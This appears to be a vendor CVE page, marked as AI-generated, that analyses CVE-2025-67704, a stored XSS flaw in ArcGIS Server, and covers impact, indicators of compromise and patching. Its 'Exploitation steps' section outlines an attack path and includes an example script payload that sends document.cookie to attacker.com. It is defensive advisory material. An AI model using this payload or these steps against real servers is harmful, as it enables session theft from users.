CVE-2025-67704: 
ArcGIS Server vulnerability analysis and mitigation

Overview

CVE-2025-67704 is a stored cross-site scripting (XSS) vulnerability in Esri ArcGIS Server 11.4 and earlier (versions 10.9.1 through 11.4) on both Windows and Linux platforms. In certain configurations, a remote unauthenticated attacker can upload or store files containing malicious code that subsequently executes in the browser context of a victim who views the affected content. The vulnerability was published on December 31, 2025, and a patch was made available in January 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) (Esri Advisory, ENISA EUVD).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the stored XSS variant (CAPEC-592). An unauthenticated remote attacker can, under certain ArcGIS Server configurations, upload or store files containing malicious scripts to the server. When a victim's browser subsequently loads or renders the stored content, the malicious code executes in the victim's browser context within the scope of the ArcGIS Server web application. The attack requires no privileges and has low complexity, though it does require user interaction (a victim visiting or triggering the stored content) (Esri Advisory, ENISA EUVD).

Impact

Successful exploitation results in limited but meaningful confidentiality and integrity impacts within the victim's browser session — an attacker can steal session tokens, cookies, or other sensitive data accessible to the browser, and can perform unauthorized actions on behalf of the victim within the ArcGIS Server application. The changed scope (S:C) indicates the impact extends beyond the vulnerable component itself to the victim's browser environment. Availability is not directly impacted. The risk is particularly relevant in environments where ArcGIS Server is exposed to untrusted users or the internet (Esri Advisory, ENISA EUVD).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.04%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Feedly, ENISA EUVD).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or network-accessible ArcGIS Server instances running version 11.4 or earlier (10.9.1–11.4) using tools like Shodan, Censys, or targeted network scanning.
  2. Identify vulnerable configuration: Determine whether the target ArcGIS Server instance is configured in a way that permits unauthenticated file uploads or storage of user-supplied content (the vulnerability is configuration-dependent).
  3. Craft malicious payload: Prepare a file or input containing a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in a victim's browser.
  4. Store the malicious file: Upload or submit the crafted file/content to the vulnerable ArcGIS Server endpoint that accepts and persists user-supplied data without adequate sanitization.
  5. Trigger victim execution: Lure or wait for an authenticated user (e.g., an administrator or GIS analyst) to access the page or resource where the stored malicious content is rendered, causing the script to execute in their browser context.
  6. Harvest results: Collect exfiltrated session tokens, cookies, or other sensitive data from the victim's browser session, potentially enabling session hijacking or further unauthorized actions within ArcGIS Server (Esri Advisory, Infinit Security).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from users' browsers to unknown external domains shortly after accessing ArcGIS Server pages; unusual POST requests to ArcGIS Server file upload or content submission endpoints from unauthenticated sources.
  • Logs: ArcGIS Server access logs showing unauthenticated file upload or content submission requests; server logs indicating storage of files with .html, .js, or other script-capable extensions in unexpected directories.
  • File System: Presence of unexpected files containing JavaScript or HTML script tags in ArcGIS Server upload directories or web-accessible folders; files with obfuscated or encoded script content stored by anonymous/unauthenticated sessions.
  • Browser/Application: Unexpected JavaScript execution or redirects when authenticated users browse ArcGIS Server pages; anomalous cookie or credential exfiltration attempts captured by web application firewall (WAF) logs.

Mitigation and workarounds

Esri has released the ArcGIS Server Security 2025 Update 2 Patch to address this vulnerability; administrators should apply this patch immediately to all affected ArcGIS Server instances (versions 10.9.1 through 11.4) on both Windows and Linux (Esri Advisory). As a configuration-based workaround, administrators should review and restrict ArcGIS Server configurations that allow unauthenticated file uploads or storage of user-supplied content, limiting such capabilities to authenticated and authorized users only. Additionally, deploying a web application firewall (WAF) with XSS filtering rules can help reduce exposure until patching is complete.

Community reactions

The vulnerability received limited but notable coverage from security aggregators and community platforms shortly after its December 31, 2025 disclosure. Security blogs such as Infinit Security published dedicated write-ups on the vulnerability (Infinit Security), and it was tracked by ENISA's European Vulnerability Database and INCIBE-CERT (INCIBE). No significant controversy or widespread social media discussion has been observed beyond standard CVE tracking and aggregation activity.

Additional resources


Source: This report was generated using AI

Related ArcGIS Server vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-9182CRITICAL9.8
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoYesJul 06, 2026
CVE-2026-9181HIGH7.5
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoYesJul 06, 2026
CVE-2025-67711MEDIUM6.1
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoYesDec 31, 2025
CVE-2026-2812MEDIUM5.3
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoYesMay 20, 2026
CVE-2026-2813MEDIUM4.1
  • ArcGIS Server logoArcGIS Server
  • cpe:2.3:a:esri:arcgis_server
NoYesMay 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management